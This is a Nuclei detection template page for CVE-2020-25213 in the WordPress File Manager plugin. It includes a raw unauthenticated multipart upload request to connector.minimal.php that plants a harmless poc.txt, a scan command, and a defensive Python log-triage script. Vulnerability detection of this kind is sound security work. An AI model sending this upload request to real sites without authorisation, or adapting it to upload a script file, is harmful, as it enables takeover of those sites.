WordPress File Manager Plugin - Remote Code Execution
ID: CVE-2020-25213
Severity: critical
Author: foulenzer
Tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive,packetstorm,webdesi9
Description
The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
YAML Source
id: CVE-2020-25213

# Uploaded file will be accessible at:-
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
info:
  name: WordPress File Manager Plugin - Remote Code Execution
  author: foulenzer
  severity: critical
  description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
  remediation: |
    Update to the latest version of the WordPress File Manager Plugin to mitigate this vulnerability.
  reference:
    - https://plugins.trac.wordpress.org/changeset/2373068
    - https://github.com/w4fz5uck5/wp-file-manager-0day
    - https://nvd.nist.gov/vuln/detail/CVE-2020-25213
    - http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/171650/WordPress-File-Manager-6.9-Shell-Upload.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-25213
    cwe-id: CWE-434
    epss-score: 0.97395
    epss-percentile: 0.99916
    cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: webdesi9
    product: file_manager
    framework: wordpress
  tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive,packetstorm,webdesi9

http:
  - raw:
      - |
        POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48

        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="reqid"

        17457a1fe6959
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="cmd"

        upload
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="target"

        l1_Lw
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="mtime[]"

        1576045135
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="upload[]"; filename="poc.txt"
        Content-Type: text/plain

        poc-test
        --------------------------ca81ac1fececda48--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - poc.txt
          - added
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a00473045022078f2226f7dbafcd1cd37543a0da0d4885bbb38bc6183d91337af4b384795f5df022100c284d9d51ddb4bd4f8d8e3b81ac2532e510eb4a54deba949cb93b2665951c3cf:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-25213.yaml"
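To check the same issue from the server side, the following added example (not part of the template or of the Nuclei project) triages web access logs for successful POSTs to the connector path and for requests to script files under the upload directory, both paths taken from the template. It assumes the Apache/nginx "combined" log format and a hypothetical list of script extensions; the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Both paths are taken from the template above.
CONNECTOR = "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
FILES_DIR = "/wp-content/plugins/wp-file-manager/lib/files/"
# Assumption: extensions the server hands to PHP; adjust to your handler config.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")

# Assumption: Apache/nginx "combined" access-log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def triage(lines):
    """Group suspicious requests by client IP."""
    findings = defaultdict(lambda: {"connector_posts": [], "script_hits": []})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path = unquote(m["path"].split("?", 1)[0]).lower()
        if m["method"] == "POST" and path == CONNECTOR and m["status"] == "200":
            findings[m["ip"]]["connector_posts"].append(m["ts"])
        elif path.startswith(FILES_DIR) and path.endswith(SCRIPT_EXT):
            findings[m["ip"]]["script_hits"].append((m["ts"], path, m["status"]))
    return dict(findings)

def high_confidence(findings):
    """Clients that posted to the connector AND requested a script under lib/files/."""
    return sorted(ip for ip, f in findings.items()
                  if f["connector_posts"] and f["script_hits"])

# Constructed sample lines (documentation IP ranges, made-up file name).
P = "/wp-content/plugins/wp-file-manager/lib"
SAMPLE_LOG = [
    f'203.0.113.7 - - [12/Sep/2020:10:15:01 +0000] "POST {P}/php/connector.minimal.php HTTP/1.1" 200 153 "-" "-"',
    f'203.0.113.7 - - [12/Sep/2020:10:15:09 +0000] "GET {P}/files/sample.php?x=1 HTTP/1.1" 200 12 "-" "-"',
    f'192.0.2.10 - - [12/Sep/2020:11:02:44 +0000] "POST {P}/php/connector.minimal.php HTTP/1.1" 404 0 "-" "-"',
    f'198.51.100.23 - - [12/Sep/2020:11:30:00 +0000] "GET {P}/files/sample.PHP HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.4 - - [12/Sep/2020:12:00:00 +0000] "GET /wp-login.php HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for ip in high_confidence(result):
        print(ip, result[ip])
```

A scan with the template itself appears only under `connector_posts`, because it uploads poc.txt and never requests a script file.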